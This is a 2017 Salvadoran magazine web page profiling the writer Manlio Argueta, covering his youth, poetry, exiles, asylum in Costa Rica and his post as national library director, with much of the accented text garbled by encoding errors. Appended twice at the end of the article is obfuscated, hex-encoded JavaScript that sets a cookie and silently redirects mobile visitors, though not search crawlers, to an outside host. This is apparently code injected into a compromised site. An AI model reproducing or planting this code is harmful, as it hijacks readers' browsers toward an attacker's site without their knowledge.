Sidebar Top

7 Feb 2017
Sidebar Top | Por: Redacción

Manlio Argueta, el escritor impaciente por relatar la realidad / Febrero 2017

Tiene 81 aAi??os, es originario de San Miguel y es considerado uno de los mejores escritores de su Ai??poca al relatar la realidad nacional con sus obras, ese es Manlio Argueta. A?Has leAi??do ai???Un dAi??a en la vidaai???? Te invitamos a que conozcas mA?s sobre el trabajo y obra de su autor a continuaciA?n.

Manlio nos comenta que empezA? a escribir desde que comenzA? a leer y, desde entonces, no ha parado. Hasta el momento, este escritor salvadoreAi??o tiene 7 obras publicadas y alrededor de 150 poemas inspirados en la realidad salvadoreAi??a; aA?n no se piensa detener porque siempre siente impaciencia por escribir. Tal vez dentro de unos meses podrAi??amos tener en nuestras manos su siguiente obra, asegura Argueta.

Cuando era pequeAi??o, en su natal San Miguel, recuerda siempre haber sobresalido en sus clases y que por eso sus profesores lo sacaban de clases para hacer mandados. Sin embargo, asegura que siempre fue porque leAi??a y lo hacAi??a muy frecuentemente, ai???ademA?s, al ser lector se sabe de ortografAi??a porque la ortografAi??a no se aprende con reglas, yo no cometo errores desde que estoy en segundo grado porque era lectorai???.

Ya en cuarto grado, Manlio confiesa, que comenzA? a escribir poemas y tanto escribAi??a que fundA? el periA?dico ai???Inquietudai??? en su adolescencia. ai???Solo un profesor prestaba atenciA?n a mis poemas, de ahAi?? todos decAi??an que traAi??a para matemA?tico y todo esoai???, rememora Argueta. Este profesor entonces le dijo a Manlio que publicarAi??a sus poemas en la secciA?n literaria del periA?dico ai???El Faro de Orienteai??? y asAi?? lo hizo. ai???A la semana me dijo que habAi??a renunciado porque lo habAi??an castigado por publicar mis poemasai???; no obstante, un aAi??o despuAi??s, a sus 19 aAi??os, Manlio ganA? sus dos primeros premios de poesAi??a en los Juegos Florales organizados por las alcaldAi??as de San Miguel y UsulutA?n.

Este famoso escritor salvadoreAi??a confiesa siempre haber tenido pA?nico escAi??nico, ai???que lo he ido superando a travAi??s de mis viajes al exterior en la promociA?n de mi novela. AprendAi?? un poco a expresarme sin el pA?nicoai???. AdemA?s, Manlio se describe como una persona perceptiva y de trabajar con la gente humilde, ya que considera que es con la que se siente mA?s a gusto; ai???incluso, mis novelas son sobre personas humildesai???.

Luego, Argueta se vino a San Salvador para estudiar en la universidad y ai???para mantenerme di clases de matemA?ticas y A?lgebraai???. ai???Era un desconocido al que le hacAi??an burla por su forma de hablar y ganAi?? dos premios de poesAi??a. Salieron publicados en el periA?dico y cuando me empiezan a buscar, pensaron que mi nombre era un pseudA?nimoai???. A raAi??z de esto, Manlio comenta que Roque Dalton y Roberto Armijo le fueron a tocar la puerta de su casa, porque ai???averiguaron que era un joven como ellosai???.

ai???Roque Dalton me decAi??a que una de mis mayores cualidades era ser muy sincero; ahora, creo que soy un gran lector, tanto que hubo un momento cuando pensaba que mA?s que escritor era lector, y lo dije. Ahora ya no, ahora siento una impaciencia por escribir, por eso yo recibo como una bendiciA?n los dAi??as de vacaciones, porque es cuando yo trabajo en la literaturaai???, confiesa Manlio.

AsAi?? mismo, recuerda que su madre siempre le aconsejaba que en la vida ai???no solo hay que ser honrado, sino hay que parecerloai???; ademA?s, siempre le brindA? todo el apoyo que pudo darle para salir adelante, a pesar de la limitada situaciA?n econA?mica en la que vivAi??an en San Miguel.

Manlio tambiAi??n comenta que tuvo algunos problemas, ya que no existAi??an los partidos polAi??ticos y Ai??l nunca estuvo a favor de la represiA?n que se vivAi??a en esa Ai??poca. ai???Fui expulsado cuatro veces del paAi??s porque me consideraban de una generaciA?n comprometida, que hacAi??amos concentraciones en el parque y obras de teatro en el Gimnasio Nacional y en el Teatro Nacional. SalAi??amos de noche de las obras y nos Ai??bamos caminando, vivAi??amos en un paraAi??so y en una dictadura militar, aun asAi?? nosotros atacA?bamos la dictaduraai???, confiesa Argueta.

De la misma manera, Manlio considera que uno de sus logros mA?s importantes ha sido estar en 40 de las universidades de Estados Unidos; asAi?? como, haber tenido a su novela ai???Un dAi??a en la vidaai??? traducida en israelAi??, ruso, hebreo, entre otros idiomas mA?s, y haber hablado de ai???la tortilla, el chucho y el cipote en una ciudad tan histA?rica como lo es NA?rembergai???, la ciudad donde juzgaron a los soldados de la Alemania nazi despuAi??s de la Segunda Guerra Mundial. Y saber que esa misma obra fue denominada, en Estados Unidos, como la quinta con mA?s impacto social en el Siglo XX.

ai???Pintura y literatura son letra e imA?genes para producir emociones. Ai??l era un niAi??o como muchos otros, todo lo que ha logrado con su obra sin duda alguna inspiraai??? comenta Augusto CrespAi??n, Director de Artes, Teatros y Espacios EscAi??nicos de la SecretarAi??a de Cultura de El Salvador y reconocido artista plA?stico en El Salvador, quien conoce a Manlio Argueta desde hace mA?s de 30 aAi??os.

Manlio detalla: ai???otras que generaciones que vinieron despuAi??s, se empezaron a burlar de nosotros. Ustedes son unos soAi??adores, si no se puede hacer la democracia con los votos, hay que hacerla con el fusil, ese grupito que luego conformaron la guerrillaai???.

Entonces, se dio cuenta que con sus poemas no podAi??a hacer mucho, por lo que a sus 28 aAi??os se dedicA? de lleno a las novelas. Su primera novela serAi??a ai???El Valle de las Hamacasai???, donde ilustrarAi??a la realidad salvadoreAi??o de la capital, San Salvador, con sus terremotos, polAi??tica y desigualdad. MA?s adelante, comenzA? a trabajar en el Editorial Universitario de la Universidad Nacional, aunque los jA?venes no entendAi??an cA?mo se podrAi??a cambiar la realidad de El Salvador solo con palabras. ai???Fue asAi?? como me fui a Costa Rica, mejor me dediquAi?? a escribir y pedAi?? asiloai???, recuerda con claridad Manlio.

Cuando estaba en tierra costarricense, Manlio se entera que habAi??an llegado entre 15 a 18 mil refugiados de El Salvador a este hermano paAi??s, y decide renunciar a impartir clases en la Universidad de Costa Rica para dedicarse a dar cultura a estos salvadoreAi??os asilados. ai???FundAi?? el Instituto Cultural SalvadoreAi??o Costarricense y comprAi?? el Teatro Sala de la Calle 15; a travAi??s del teatro ayudA?bamos a grupos alternativos y uno de ellos llegA? a representar mi obra, ai???Un dAi??a en la vidaai???.

Un aAi??o despuAi??s de la firma de los Acuerdos de Paz, en 1993, Argueta regresA? a El Salvador y durante siete aAi??os fungiA? como funcionario en la UES hasta que en el 2000 pidiA? su traslado como Director de la Biblioteca Nacional ai???Francisco Gavidiaai??? de El Salvador (BINAES). ai???Ahora estoy aquAi?? en mi mero jugo, los libros, me vine en el 2000 voy a cumplir 17 aAi??os hoy en marzoai???, explica Manlio.

Como director de la BINAES, Manlio busca ai???fortalecer el formato digital, porque ya tienen internet inalA?mbrico, salas de internet gratis y atraer a los jA?venes, a los niAi??osai???; mientras que, como escritor desea terminar una obra de su autorAi??a sobre la guerra de los filibusteros que ocurriA? en Costa Rica, y que costA? la vida del 10% de la poblaciA?n costarricense y muchos salvadoreAi??os que participaron.

Finalmente, Manlio aconseja a los jA?venes que si desean superarse es necesario que lean. ai???Tienen que leer bastante, no importa si es papel o digital, porque la lectura te da fluidez de pensamiento, conceptualizaciA?n y sobre todo mA?s tendencia a lo propositivo, a veces tendemos a ser destructivos y eso hay que desecharlo. Puede ser literatura, esta te da conocimientos en valores A?ImagAi??nate el valor que puede tener en Rusia o Estados Unidos!ai???, recalca Argueta.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

11 Sep 2018
Romeo Majano, el doctor que cura el corazón sin operaciones / septiembre 2018
Sidebar Top | Por: Redacción

Romeo Majano, el doctor que cura el corazón sin operaciones / septiembre 2018

7 Ago 2018
Bryan Pérez, el surfista estrella – Agosto 2018
Sidebar Top | Por: Mariana Arévalo

Bryan Pérez, el surfista estrella – Agosto 2018

3 Jul 2018
Rodrigo Bolaños, el salvadoreño detrás de una fábrica de oportunidades- julio 2018
Sidebar Top | Por: Mariana Arévalo

Rodrigo Bolaños, el salvadoreño detrás de una fábrica de oportunidades- julio 2018

5 Jun 2018
Danilo Leiva, el docente de matemáticas inspirador – Junio 2018
Sidebar Top | Por: Mariana Arévalo

Danilo Leiva, el docente de matemáticas inspirador – Junio 2018